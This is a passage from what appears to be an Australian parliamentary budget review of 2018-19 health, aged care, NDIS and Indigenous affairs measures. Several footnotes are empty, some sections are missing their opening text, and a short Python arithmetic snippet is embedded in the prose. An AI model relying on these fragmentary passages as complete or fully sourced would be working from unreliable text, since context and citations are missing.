552. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.9: Health Portfolio, p. 21. 553. S Rosenberg, ‘Mental health funding in the 2017 budget is too little, unfair and lacks a coherent strategy’, The Conversation, 11 May 2017. 554. K Gregory, ‘Australia lagging on funding for mental health services, says Mental Illness Fellowship’, ABC News, 11 May 2015. 555. Mental Health Australia (MHA), Mental health sector unites to highlight shortcomings in Fifth National Mental Health Plan,
media release, 20 December 2016. 556. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.9: Health Portfolio, p. 16. 557. Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.10: Health Portfolio, pp. 17-18. 558. $27.1 million of this commitment is for Primary Health Networks for the commission of services, and is contingent on co-
contributions from state and territory governments. The budget figures in this brief have been taken from the following document unless otherwise sourced : Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 106-126. 559. MHA, Mental Health Australia 2018/19 pre-budget submission, MHA, 7 March 2018, p. 12. 560. beyondblue, beyondblue welcomes suicide prevention funding announcement, media release, 8 May 2018.
of a program to target the mental health of older Australians in the community, particularly those at risk from isolation.
In 2012, just over half of all permanent aged care residents had symptoms of depression.561 Further, in 2016, men over 85 had the highest rate of suicide in Australia.562 Despite this, older Australians in residential care are not eligible for Medicare subsidised psychological treatment through the GP Mental Health Treatment Plan.563 While it appears that the measure was introduced to address this gap, it is unclear whether changes will be made to the eligibility criteria for the GP Mental Health Treatment Plan, or if the measure will address this gap in other ways.
Stakeholders have overwhelmingly supported this measure, as older Australians in residential aged care facilities have previously ‘not had adequate access to mental health care, and been left unsupported when dealing with conditions like depression and dementia’.564
Mental health research
The Government announced a distribution of $125.0 million from the Medical Research Future Fund over 10 years from 2017-18 for the Million Minds Mental Health Research Mission (the Million Minds Mission). The Million Minds Mission will look at prevention, new diagnoses, and new treatment for mental health to support priorities under the Fifth National Mental Health and Suicide Prevention Plan, with a particular focus on clinical trials.565
Stakeholders have supported the investment in health and medical research in the Budget, with Mental Health Australia commending the ‘welcome shift to investment on a 10 year horizon’.566
Other mental health measures
Royal Flying Doctor Service
The Government has committed $84.1 million to the Royal Flying Doctor Service, to improve the delivery and availability of dental, mental health and emergency services to Australia’s rural and remote communities. This includes a new Mental Health Outreach Clinic, which will provide professional mental health services from 1 January 2019.567 This funding has been welcomed by stakeholders, with the CEO of the National Mental Health Commission commending it for being a ‘much needed boost’.568
National Mental Health Commission
The Government announced an additional $12.4 million over four years from 2018-19 for the National Mental Health Commission to oversee mental health reform and implement the Fifth National Mental Health and Suicide Prevention Plan.569 This funding was welcomed by
561. Australian Institute of Health and Welfare (AIHW), Australia’s welfare 2015, AIHW, Canberra, 2015, p. 278. 562. Australian Bureau of Statistics (ABS), Causes of Death, Australia, 2016, cat. no. 3303.0, ABS, Canberra, 2017. 563. Senate Community Affairs Committee, Answers to Questions on Notice, Health Portfolio, Additional Estimates 2016-17, 1 March 2017, Question SQ17-000283.
564. Australian Psychological Society, Budget: investments in mental health and aged care welcome, media release, 9 May 2018; Australian College of Nursing, Australian Government health budget 2018-19, media release, 8 May 2018; MHA, Mental Health Australia welcomes new mental health investments, media release, 9 May 2018.
565. G Hunt (Minister for Health), Transcript of interview with Laura Jayes on Sky News Live, media release, 6 March 2018. 566. MHA, Mental Health Australia welcomes new mental health investments, op. cit. 567. M McCormack (Deputy Prime Minister) and J McVeigh (Minister for Regional Development, Territories and Local Government), Regional Australia—A stronger economy delivering stronger regions 2018-19, ministerial budget statement,
2018, p. 92. 568. National Mental Health Commission, Federal budget makes the mental health of our nation a top priority, media release, 9 May 2018. 569. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.9: Health Portfolio, p. 22.
stakeholders, particularly Mental Health Australia, which identified funding the implementation of the Fifth National Mental Health and Suicide Prevention Plan as a key priority in its pre-Budget submission.570
Youth mental health
On 8 January 2018, the Minister for Health announced $110.0 million in additional investment in child and youth mental health. This included up to $46.0 million to beyondblue for its integrated school-based Mental Health in Education initiative, $30.0 million to the headspace National Youth Mental Health Foundation to provide support to Primary Health Networks in commissioning headspace services, $16.0 million to Emerging Minds for the National Workforce Support in Child Mental Health initiative, and $13.5 million for the operation of the National Centre of Excellence in Youth Mental Health.571 However, there did not appear to be any references to this package in the Budget.
570. MHA, Mental Health Australia 2018/19 pre-budget submission, op. cit., p. 7. 571. G Hunt (Minister for Health) and B McKenzie (Minister for Rural Health), $110 million additional investment in child and youth mental health, media release, 8 January 2018.
Aged care
Alex Grove
In the 2018-19 Budget the Government has responded to two key reviews of aged care, as well as growing demand for home care packages. The response takes the form of an omnibus budget measure for ‘healthy ageing and high quality care’. This measure comprises 23 initiatives across aged care provision, consumer access to aged care, quality and regulation of aged care and healthy ageing.572 The most significant initiatives in terms of funding or policy change are briefly outlined in this article.
The Department of Health notes an additional $5.0 billion over five years for ageing and aged care.573 Overall spending on aged care services is forecast to grow from $18.0 billion in 2018-19 to $22.1 billion in 2021-22, largely reflecting demographic factors.574 However, the overall impact of the omnibus measure on the Budget appears broadly neutral, with a small net reduction in expenditure of $19.5 million over the forward estimates offset by a small net reduction in revenue of $18.4 million and a small increase in capital expenditure of $4.2 million. The net changes to underlying cash balance detailed in the tables are small, suggesting that the initiatives are to be funded by repurposing existing funds, but there is no information on how this is envisaged.575 It may relate to future targets for the number of home and residential care places, which are discussed further below.
Residential and home care places
The Government releases residential aged care places, short-term restorative care (STRC) places (which provide up to eight weeks of care and services designed to delay or avoid admission to residential care) and capital grants to aged care providers in an annual competitive process called the Aged Care Approvals Round (ACAR).576 Home care packages (HCPs), which are coordinated packages of care to help eligible older people remain at home rather than entering residential care, are assigned directly to consumers on a regular basis through a national prioritisation system.577 As at 31 December 2017, there were 104,602 consumers waiting for an HCP, although 46 per cent of those had an interim lower level package while they were waiting for a package at their approved level.578
The Budget includes 14,000 new high-level home care packages over four years from 2018-19, as well as 13,500 residential aged care places, 775 STRC places and $60 million in capital grants to be released through the 2018-19 ACAR. This is expected to cost $1.6 billion over four years.579
The total number of aged care places grows in line with the size of the older population over 70. The Government was aiming for 45 home care places, 78 residential places and 2 STRC places per
572. Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 117-19. 573. Department of Health (DoH), Health 2018-19 Budget at a glance—key initiatives, Budget 2018-19 fact sheet, DoH, 8 May 2018. 574. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, pp. 6-23, 6-24. 575. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 117. 576. DoH, ‘Aged Care Approvals Round (ACAR)’, Ageing and Aged Care website, last updated 9 May 2018. 577. Aged Care Financing Authority (ACFA), Fifth report on the funding and financing of the aged care sector, ACFA, July 2017,
p. 45.
578. DoH, Home Care Packages Program: data report 2 nd quarter 2017 -18: 1 October -31 December 2017, DoH, Canberra, March
2018, p. 9. Home care packages range from level 1 (basic care needs) to level 4 (high care needs), with higher level packages attracting larger Australian Government subsidies. 579. DoH, Better access to care—more high level home care packages and residential care places, Budget 2018-19 fact sheet, DoH, 8 May 2018.
1,000 people aged 70 and over by 2021-22.580 It appears that the mix of places in this target may have changed, although this is not explicitly stated in the budget measure.
One of the initiatives in the budget measure is to ‘combine the Residential Care and Home Care programs from 1 July 2018 to provide greater flexibility to respond to changes in demand for home care packages and residential aged care places.’581 The Government has reportedly confirmed it is allocating funding not required for residential places to home care, where demand is higher.582 The 2017-18 Budget had a target of 232,300 residential places and 134,545 HCPs by 2020-21.583 The 2018-19 Budget has a revised target of 225,000 residential places (7,300 fewer places) and 144,500 HCPs (9,955 more places) by 2020-21.584
It appears the increase in HCPs has been offset by a decrease in the more expensive residential places, which may explain the budget neutrality of the overall measure. However, the Government has rejected Labor’s assertion that there is no new funding for aged care in the Budget.585
Response to the Legislated Review of Aged Care 2017
The Legislated Review of Aged Care 2017 (the Tune review) made 38 recommendations for a more consumer centred and sustainable aged care system.586 The Government rejected recommendations to include the full value of the owner’s home in the means test for residential care and to remove the annual and lifetime caps on means-tested care fees.587 This Budget responds to a number of the remaining Tune review recommendations through initiatives including:
• $105.7 million over four years (including $32.0 million from existing resources) to provide more aged care in remote Indigenous communities (recommendation 31)
• $61.7 million over two years to make the Government’s My Aged Care website easier for consumers to use (recommendation 25)
• $14.8 million over two years to prepare for a streamlined national assessment framework which could potentially allow people to access all types of aged care via a single assessment (recommendation 27)
• $7.4 million over two years to trial a range of services to help people navigate the aged care system (recommendation 23)
• $0.3 million for a study to assess the impact of allocating residential places to consumers rather than providers (recommendation 3) and
• $8.6 million over four years to improve the management of prudential risk by aged care providers, including through a compulsory levy on providers to recoup the cost of providers defaulting on the repayment of accommodation bonds to consumers (recommendations 20 and 21).588
580. ACFA, Fifth report on the funding and financing of the aged care sector, op. cit., p. xiii. 581. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 118. 582. R Morton, ‘Bond levy sparks collapse fears’, The Australian, 10 May 2018, p. 10. 583. Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.10: Health Portfolio, pp. 132, 135. 584. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.9: Health Portfolio, pp. 138-39. 585. R Morton, op. cit. 586. D Tune, Legislated review of aged care 2017, DoH, 2017, pp. 12-17. 587. K Wyatt (Minister for Aged Care), 6,000 extra high need home care packages and $20 million My Aged Care revamp, media
release, 14 September 2017. 588. Budget measures: budget paper no. 2: 2018-19, op cit., pp. 117-19; Tune, Legislated Review of Aged Care 2017, op. cit., pp. 13-16.
This last initiative would involve changes to the Accommodation Payment Guarantee Scheme, which would require legislation.589
Response to the Review of National Aged Care Regulatory Processes
The Review of National Aged Care Regulatory Processes (the Carnell-Paterson review) recommended combining the Aged Care Complaints Commissioner (who handles complaints about aged care services), the Australian Aged Care Quality Agency (which accredits aged care providers and monitors compliance with standards) and the sanctioning powers of the Department of Health into a single independent Aged Care Quality and Safety Commission.590 The Budget provides $253.8 million over four years to support the functions of this new Commission, which is to be established by January 2019. The initiative is budget neutral, presumably because these activities are already funded.591 Establishing the Commission would require legislation.
The Budget addresses other recommendations of the Carnell-Paterson review through funding to make information about the quality of residential care providers more accessible to consumers (including publishing performance ratings on the My Aged Care website) and to improve the proposed Commission’s ability to identify risks to consumers and respond to care failures.592
Other aged care and healthy ageing measures
The Budget also funds initiatives to help providers adapt to proposed new aged care standards, improve palliative care in residential aged care (subject to matched funding from the states and territories), support aged care capital works in rural and regional Australia, develop technological solutions for people living with dementia, encourage healthy ageing and improve the mental health of older people.593 The latter initiative is described in the ‘Mental health’ Budget Review article.
Stakeholder response
The response to the aged care initiatives in the Budget has been relatively positive. Consumer peak bodies COTA Australia and National Seniors Australia (NSA) welcomed the 14,000 new high-level home care packages, although NSA Chief Advocate Ian Henschke noted this will still leave many people on the waiting list for packages. COTA Australia also praised the Government’s decision to explore options for allocating residential places to consumers rather than providers.594
Some stakeholders praised the initiatives while noting other issues they felt were not addressed in the Budget. Australian Nursing and Midwifery Federation Acting Federal Secretary Annie Butler welcomed funding for additional home care packages and palliative care services, but called on the Government to introduce mandated minimum staffing ratios in residential care.595 Dementia Australia welcomed many of the budget initiatives, including the establishment of the new Aged Care Quality and Safety Commission and funding for dementia innovation, but CEO Maree McCabe
589. DoH, Better quality of care —managing prudential risk in residential care, Budget 2018-19 fact sheet, DoH, 8 May 2018. 590. K Carnell and R Paterson, Review of National Aged Care Regulatory Processes, October 2017, p. xi. 591. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 118; DoH, Better quality of care - establishing an Aged Care Quality and Safety Commission, Budget 2018-19 fact sheet, DoH, 8 May 2018.
592. DoH, Better quality of care—greater transparency of quality in aged care and Better quality of care—improving aged care quality protection, Budget 2018-19 fact sheets, DoH, 8 May 2018. 593. Budget measures: budget paper no. 2: 2018-19, op. cit., pp. 118-19. 594. COTA Australia (formerly Council on the Ageing), Extra home care packages and other welcome aged care measures will
provide relief for older Australians, media release, 9 May 2018; National Seniors Australia, Federal Budget a mixed bag for seniors, media release, 8 May 2018. 595. Australian Nursing and Midwifery Federation, Budget fails to deliver improved staffing in aged care, media release, 8 May 2018.
stated the Budget did not recognise dementia as core business.596 Aged care provider peak bodies generally responded positively to the initiatives contained in the Budget, but would like to see a longer term plan to sustainably fund aged care in the face of rising costs and increasing need.597
596. Dementia Australia, Dementia Australia welcomes $5 billion Federal Government funding for aged care, media release, 8 May 2018. 597. S Cheu, ‘Budget: new measures welcome but long-term fix needed, say stakeholders’, Australian Ageing Agenda website, 9 May 2018.
National Disability Insurance Scheme
Shannon Clark and Luke Buckmaster
In the 2018-19 Budget, the Government commits to ‘guaranteeing essential services’, including ‘fully funding its share of the National Disability Insurance Scheme’.598 It also reverses the 2017-18 Budget’s proposal to increase the Medicare levy by 0.5 per cent to provide funding for the NDIS.599 The 2018-19 Budget includes two additional measures to support the NDIS and disability services—a measure on continuity of support and the NDIS Jobs and Market Fund.
It is unlikely the measures will require new legislation.
‘Fully funding’ the NDIS
From 2018-19 to 2021-22, the total expenses for the NDIS are $83.4 billion, of which the Australian Government will contribute $43.2 billion.600.601 The Australian and state and territory governments jointly contribute to the costs of the NDIS, which is delivered through the National Disability Insurance Agency, a corporate Commonwealth entity.602, 603 The remainder is from Australian Government revenue, savings or borrowings.604
The debate around funding the NDIS has been contentious.605.606
In the 2017-18 Budget, the Government announced that it would increase the Medicare levy by 0.5 per cent to 2.5 per cent of taxable income to ‘ensure the National Disability Insurance Scheme (NDIS) is fully funded’.607 The measure was proposed to begin on 1 July 2019 and generate revenue of $8.2 billion over the forward estimates. However, shortly before the 2018-19 Budget, the Government announced that it would no longer be increasing the Medicare levy and
598. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, p. 3-9. 599. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 32. 600. Budget strategy and outlook: budget paper no. 1:2018-19, op. cit., p. 6-24. 601. Ibid., p. 6-10; see also p. 6-25. 602. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.15: Social Services Portfolio, p. 138. 603. Productivity Commission (PC), National Disability Insurance Scheme (NDIS) costs, Position paper, PC, Canberra, 2017, p. 328;
L Buckmaster, ‘’Fighting for funding’: where to next for the NDIS?’, FlagPost, Parliamentary Library blog, 27 April 2018. 604. Ibid. 605.. 606.. 607. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 24.
that it could ‘fully fund’ the NDIS without it due to a stronger economy and an improved budget fiscal position.608
In the 2018-19 Budget, the Government has again committed to ‘fully funding’ its contribution to the NDIS, although, as noted, without the previously proposed increase to the Medicare levy.609.610 However, some concern in relation to the long-term certainty of NDIS funding remains. Ken Baker, Chief Executive of National Disability Services, warned against the NDIS being treated as a political football and emphasised: ‘Long-term certainty for the NDIS is imperative.’611
National Disability Insurance Scheme—continuity of support
The 2018-19 Budget includes a measure for ensuring continuity of support for people with disability who are currently receiving support under programs transitioning to the NDIS, but who are ineligible for the NDIS.612 The measure provides $92.1 million over five years from 2017-18.613.614
There are 17 Commonwealth funded disability programs transitioning funds and clients to the NDIS, of which 15 programs require continuity of support.
Five packages of continuity of support will be implemented from 1 July 2019:
• continuity of support for mental health programs
• continuity of support for carer programs
• a continuity of support Fund
• continuity of support for Mobility Allowance recipients and
• continuity of support for clients of the National Auslan Interpreter Booking and Payment Service.615
While most clients of existing disability programs are expected to transition to the NDIS, some people will be ineligible due to not meeting the NDIS’s access requirements for residence, age or
608. D Tehan (Minister for Social Services), A fully funded NDIS, media release, 26 April 2018; for discussion about stakeholders’ reactions to the announcement, please see ‘’Fighting for funding’: where to next for the NDIS?, op. cit. 609. Budget strategy and outlook: budget paper no. 1:2018-19, op. cit. 610. Every Australian Counts, Every Australian Counts welcomes permanent funding for the NDIS, media release, 8 May 2018. 611. National Disability Services, Government confirms NDIS commitment—now let's make sure the scheme works, media release,
8 May 2018. 612. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 176. 613. Ibid. 614. National Disability Insurance Agency (NDIA), ‘Continuity of support’, NDIS website. 615. Department of Social Services (DSS), Continuity of support for clients of Commonwealth disability programs, fact sheet, DSS,
2018.
disability. Approximately 27,000 clients of Commonwealth funded programs will receive continuity of support.616
National Disability Insurance Scheme Jobs and Market Fund
The 2018-19 Budget provides $64.3 million over four years to support the development of disability provider markets and grow the workforce both in number and capability.617.618 The Productivity Commission reported that early evidence ‘indicates that the workforce is growing quickly, but not fast enough to meet the overall growth target.’619 An inquiry into market readiness for the NDIS, including workforce considerations, is currently being conducted by the Joint Standing Committee on the National Disability Insurance Scheme.620.621
616. Ibid. 617. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 176; DSS, NDIS Jobs and Market Fund, fact sheet, DSS, 2018. 618. Disability Reform Council, National Disability Insurance Scheme Integrated Market, Sector and Workforce Strategy, DSS, Canberra, 2015, p. 19. 619. National Disability Insurance Scheme (NDIS) costs, op. cit., p. 249. 620. Australian Parliament, Joint Standing Committee on the National Disability Scheme - Market readiness inquiry, Parliament of
Australia website. 621. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 177.
Indigenous affairs: education, employment, and community safety
James Haughton
This article covers budget measures relating to Indigenous education, employment, and community safety and the rule of law, the government’s key priority areas for Indigenous affairs.622 Where relevant it also notes measures which were in the Mid-Year Economic and Fiscal Outlook 2017-18 (MYEFO). Measures relating to Indigenous health, housing and other issues are in a separate article.623
Education
There are two measures relating to Indigenous education in the Budget:
• the extension of the National Partnership Agreement on Universal Access to Early Childhood Education. The original version of this National Partnership began under the Rudd Government in order to implement the Closing the Gap target of universal access to preschool education for Indigenous children, and maintains a strong focus on Indigenous enrolment and attendance (see the separate article, ‘School education and early learning’) and
• increased support for Indigenous secondary students through the ‘50 Years of ABSTUDY—strengthening ABSTUDY for secondary students’ measure (see the ‘Student payments’ article).
There are no Budget measures relating to the Closing the Gap targets of improving school attendance and literacy and numeracy, which are not on track to be met.624 However, the MYEFO contained two Indigenous education measures:
• the School Enrolment and Attendance Measure (SEAM), which imposed social security payment penalties on parents in remote areas in Queensland and the Northern Territory (NT) whose children were not enrolled or did not attend school, was ceased, for a net saving to the government of $29.6 million625 and
• the provision of $4.1 million to extend Flexible Literacy in Remote Primary Schools until the end of 2018.626
Employment
622..
623. The budget measures and figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 76-7, 165-73. 624. Department of the Prime Minister and Cabinet (PM&C), Closing the Gap Prime Minister’s report 2018, Commonwealth of Australia, Canberra, 2018, pp. 8-9. 625. S Morrison (Treasurer) and M Cormann (Minister for Finance), Mid-year economic and fiscal outlook 2017-18, p. 176. 626.27..
The reform measure will ‘redirect’ CDP funding of $1.1 billion into a new scheme including:
• reducing the necessity of people with low (0-14 hours) work requirements to contact Centrelink
• ensuring job seekers are not required to participate beyond their capacity through an improved assessment process that will clearly identify any barriers to employment they have
• reducing required participation from up to 25 hours per week, to up to 20 hours per week; this would still apply to the full year, rather than for six months as is the case for non-remote work-for-the-dole programs
• creating 6,000 subsidised employment positions. Significantly (given concerns raised about the previous proposed CDP scheme) these will be ‘real jobs’ including minimum wage requirements, superannuation and workplace health and safety regulations628
• establishing a fund for CDP providers (particularly Indigenous community organisations) and
• making CDP recipients subject to the mainstream Jobseeker Compliance Framework (JCF), the more stringent ‘demerit point’ system for welfare recipients introduced in last year’s budget and enabled by the Social Services Legislation Amendment (Welfare Reform) Act 2018 (Welfare Reform Act).629
A previous attempt to create a new legislative scheme for the CDP lapsed with the prorogation of Parliament, after receiving sustained criticism from stakeholders.630 With the exception of the inclusion of recipients in the JCF, these proposed reforms are in line with those the Government proposed in a recent discussion paper on remote employment and participation, which received support from some significant stakeholders.631 Most negative stakeholder reactions to the proposed changes have focussed upon the new proposal to bring CDP recipients under the JCF.632 The Government had previously expressed the intention to exempt CDP participants from the JCF, drug and alcohol measures, and other changes introduced under the Welfare Reform Act, and it is unclear what parts of the JCF are now intended to apply to CDP participants.633 This measure’s results may depend on how the ‘improved assessment process’ works and how treatment of people with ‘barriers to employment’ interacts with the JCF’s more stringent attitude to no-shows and those with drug and alcohol problems.634
628..
629. M Thomas, ‘Job seeker compliance and workforce participation’, Budget Review 2017-18, Research paper, Parliamentary Library, Canberra, May 2017. 630. J Haughton, Social Security Legislation Amendment (Community Development Program) Bill 2015, op. cit. 631.. 632.. 633. The Government previously expressed the intent to exclude CDP participants from components of the JCF: Explanatory Memorandum, Social Services Legislation Amendment (Welfare Reform) Bill 2017, pp. 57, 62, 81, 88, 92, 144, 158. 634. M Thomas, ‘Job seeker compliance and workforce participation’, op. cit.
The Cashless Debit Card trial, which applies to welfare recipients in the East Kimberley and Ceduna, who are over 80 per cent Aboriginal, will be extended until 30 June 2019. The cost was not published.635
Community safety and rule of law.636
The scheme is detailed in the separate ‘Extending mutual obligation—court-ordered fines and arrest warrants’ article.
Other measures in this space include:
• $18.2 million to support domestic violence prevention and protection programs for women and girls, including maintaining the current DV-Alert service and 1800RESPECT trauma counselling service. The Minister for Indigenous Affairs has noted that this is a measure that will benefit Indigenous people.637 It is not an Indigenous-specific measure but both DV-Alert and 1800RESPECT have Indigenous-specific components638
• $8.4 million for a National Apology, records retention, and Commonwealth implementation of the recommendations of the Royal Commission into Institutional Responses to Child Sexual Abuse. Of the 7,981 survivors interviewed by the Royal Commission, 14.9 per cent were Indigenous, reflecting Indigenous children’s historical and current over-institutionalisation and their higher vulnerability to abuse639 and
• $1.2 million over four years to implement the Optional Protocol to the Convention against Torture and Other Cruel, Inhuman or Degrading Treatment or Punishment (OPCAT), providing for the Commonwealth Ombudsman to conduct independent inspections of places of detention. Ratification of OPCAT was part of the Commonwealth’s response to the revelations of torture and abuse of predominantly Aboriginal children in the Northern Territory’s juvenile detention system by Four Corners on 25 July 2016.640
635..
636..
637. N Scullion (Minister for Indigenous Affairs), 2018-19 Budget to strengthen economic, employment and health opportunities for First Australians, media release, 9 May 2018. 638. DV-Alert, ‘Indigenous Workshops’, DV-Alert website, n.d.; 1800RESPECT, ‘Aboriginal and Torres Strait Islander experiences of violence’, 1800RESPECT website, n.d. 639. Royal Commission into Institutional Responses to Child Sexual Abuse, Final Information Update, November 2017, p. 3. 640. M White and M Gooda, Report of the Royal Commission and Board of Inquiry into the Protection and Detention of Children in
the Northern Territory, vol.1, Commonwealth of Australia, Canberra, November 2017, p. 204.
Indigenous affairs: health, housing and other measures
James Haughton
Health
Two Closing the Gap targets relate directly to Indigenous health—the target to close the life expectancy gap by 2031 and the target to halve the child mortality gap by 2018.641 Of these, the life expectancy target is not on track, while the child mortality target was on track in 2016. However, as the Prime Minister’s 2018 Closing the Gap report has noted, since the Closing the Gap goals were announced in 2008, progress has slowed, with a decline in Indigenous child mortality rates of 11.5 per cent.642
Analyses of Indigenous budgets, such as the Productivity Commission’s Indigenous Expenditure Report, frequently distinguish between Indigenous specific programs and ‘mainstream’ programs that are also accessed by Indigenous people.643 This corresponds to government accounting categories and also reflects the reality that, unless specific targeting and culturally appropriate and safe program delivery are incorporated, mainstream programs usually under-service Indigenous people.644 The 2018-19 Budget includes both Indigenous-specific health measures and mainstream measures with Indigenous-targeted components.
Indigenous-specific measures
The Budget includes $3.9 billion for Department of Health Program 2.2, ‘Aboriginal and Torres Strait Islander Health’, over four years from 2018-19, an increase of $200 million in total or about 4 per cent per year over current levels.645 This includes:
• a new funding model for Aboriginal Community Controlled Health Services (ACCHSs) devised in consultation with the sector, with no net funding change646
• $105 million for better access to aged care for Aboriginal and Torres Strait Islander people, including support for remaining in remote communities.647 See also the Parliamentary Library Budget Review article, ‘Aged care’
• $34.8 million over four years to support the delivery of dialysis by nurses, including Aboriginal and Torres Strait Islander health workers in remote areas, under a new Medicare Benefits Schedule item. This will mean that people needing dialysis will no longer have to move to urban centres such as Alice Springs or Darwin to receive treatment648
• $4.8 million over three years to address crusted scabies in northern Australia, with the aim of eliminating it by 2022. Crusted scabies infection is associated with overcrowding and can cause rheumatic fever, rheumatic heart disease and renal disease, which are leading causes of death for Indigenous people649 and
• $3 million to increase the budget for Indigenous eye health to $34.3 million, and $30 million for Indigenous hearing health assessments.650 This latter appears to be a reannouncement of the
641. Department of the Prime Minister and Cabinet (PM&C), Closing the Gap: Prime Minister’s Report 2018, 2018, pp. 8-9. 642. Ibid, p. 38. 643. Productivity Commission, Indigenous expenditure report 2017, Productivity Commission, 2017. 644. Indigenous-specific health programs are usually budgeted under the Department of Health’s (DoH) Program 2.2, ‘Aboriginal
and Torres Strait Islander Health’ in the DoH Portfolio Budget Statement. On mainstream underservicing, see: K Alford, ‘Indigenous health expenditure deficits obscured in Closing the Gap reports’, Medical Journal of Australia, 203 (10), 2015, p. 403. 645. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.9: Health Portfolio, pp. 20, 63. 646. DoH, Indigenous health -Indigenous health services, Budget fact sheet, DoH, 8 May 2018. 647. DoH, Indigenous health -National Aboriginal and Torres Strait Islander Flexible Aged Care program, Budget fact sheet, DoH,
8 May 2018. 648. DoH, Indigenous health -investment in remote renal services and infrastructure, Budget fact sheet, DoH, 8 May 2018. 649. DoH, Indigenous health -crusted scabies, Budget fact sheet, DoH, 8 May 2018. 650. DoH, Indigenous health -hearing and eye health, Budget fact sheet, DoH, 8 May 2018.
pre-budget commitment of $29.4 million to extend the Healthy Ears—Better Hearing, Better Listening Program.651
Non-Indigenous specific measures
Non-Indigenous specific measures with a noted Indigenous component or corresponding to areas of high Indigenous need include:
• $23.2 million over four years for the Healthy Active Beginning Package, including a policy to reduce the traumatic injury rate among young Indigenous Australians, who are 4.5 times more likely to sustain serious injury than non-Indigenous children652
• $338.1 million for mental health, including suicide prevention, remote mental health care and youth mental health—see the Parliamentary Library Budget Review article, ‘Mental health’
• $83.3 million for rural health, including investment in Aboriginal and Torres Strait Islander Health Professional Organisations of around $1.6 million a year.653 See also the Parliamentary Library Budget Review article, ‘Rural health workforce’ and
• $17.5 million over four years, provided from the Medical Research Future Fund (MRFF), for research into ‘Maternal health and the First 2000 days’ to address social determinants of health.654 This seems to be modelled on the First 1000 Days Australia program for Aboriginal and Torres Strait Islander maternal and infant health promoted by Professor Kerry Arabena.655
Peak bodies in targeted areas, such as the National Aboriginal Community Controlled Health Organisations (NACCHO), the National Aboriginal and Torres Strait Islander Health Workers Association and Vision Australia, have generally welcomed the increased health spending.656 However, several expressed concern that the Budget made little mention of the Closing the Gap framework or the Implementation Plan for the National Aboriginal and Torres Strait Islander Health Plan 2013-2023.657
Housing
The Budget includes $550 million over five years for housing in remote Aboriginal communities in the Northern Territory, which is to be matched by $550 million from the Northern Territory Government. Currently, the National Partnership on Remote Housing (NPRH) will expire on 30 June 2018 without any further Australian Government investment for remote Indigenous housing in other states. The Minister for Indigenous Affairs, Nigel Scullion, has been reported as saying that negotiations with the states over future funding for remote Indigenous housing are ongoing.658
651. K Wyatt (Minister for Indigenous Health), Listening to Indigenous needs: Healthy Ears Program extended, media release, 9 March 2018. 652. N Scullion (Minister for Indigenous Affairs), 2018-19 Budget to strengthen economic, employment and health opportunities for First Australians, media release, 9 May 2018. 653. DoH, Indigenous health -continuation and expansion of support for Aboriginal and Torres Strait Islander Health Professional
Organisations, Budget fact sheet, DoH, 8 May 2018. 654. The budget measures and figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 116. 655. First 1000 Days Australia website. 656. National Aboriginal Community Controlled Health Organisations (NACCHO), Government announces new funding model for
ACCHS, media release, 9 May 2018; See NACCHO Aboriginal Health News Alert, Top 10 peak health organisation press release responses for a compilation of Indigenous health peak body budget responses. 657. Ibid. 658. B Smee, ‘Indigenous leaders say remote housing in jeopardy after “devastating” budget cut’, The Guardian, 10 May 2018; R Hocking, ‘Community reactions mixed as budget detail revealed’, National Indigenous Television (NITV), 9 May 2018; National Congress of Australia’s First Peoples, First peoples sacrificed in the name of budget surplus, media release, 9 May 2018.
Reducing overcrowding is necessary to improve Indigenous health, education and other outcomes in remote Australia.659 The Department of the Prime Minister and Cabinet’s Remote Housing Review (the Review) found that 5,500 more houses will be needed in remote Indigenous communities by 2028 to address severe overcrowding and population growth: 2,750 properties are required in the Northern Territory (NT), 1,100 in Queensland, 1,350 in Western Australia and 300 in South Australia. To address moderate overcrowding, approximately double this number of houses will be needed.660
The Review also found that best practice besser block construction in the NT, which has been the preferred design since 2014, had capital costs of about $520,000 per house, plus ancillary program costs of 15 per cent.661 On this basis, $550 million would build approximately 920 houses. The matching NT contribution would double this, to 1,840 houses by 2023. If this housing program, and Commonwealth support for it, were continued to 2028 (as the NT government has indicated), and costs remained constant, then 3,680 houses would be built, meeting the 2,750 house target and making substantial inroads into moderate overcrowding.
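The house-count arithmetic above can be sanity-checked with a short calculation. This is only a sketch: the per-house capital cost and the ancillary rate are the Remote Housing Review figures quoted in the text, and the variable names are illustrative.

```python
# Sanity check of the remote-housing arithmetic cited in the text
# (figures from the Remote Housing Review, as quoted above).
CAPITAL_COST_PER_HOUSE = 520_000      # best-practice capital cost per house (NT)
ANCILLARY_RATE = 0.15                 # ancillary program costs, share of capital cost
COMMONWEALTH_FUNDING = 550_000_000    # Commonwealth commitment over five years

all_in_cost = CAPITAL_COST_PER_HOUSE * (1 + ANCILLARY_RATE)   # $598,000 per house
houses = round(COMMONWEALTH_FUNDING / all_in_cost)

print(houses)        # ~920 houses from the Commonwealth share alone
print(houses * 2)    # ~1,840 houses with the matching NT contribution, by 2023
print(houses * 4)    # ~3,680 houses if continued at the same rate to 2028
```

The ~3,680 figure is what allows the text to conclude that a continued program would meet the Review's 2,750-house target for severe overcrowding in the NT.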
Other measures
There are several measures relating to infrastructure and economic growth in remote areas with many Indigenous communities, including:
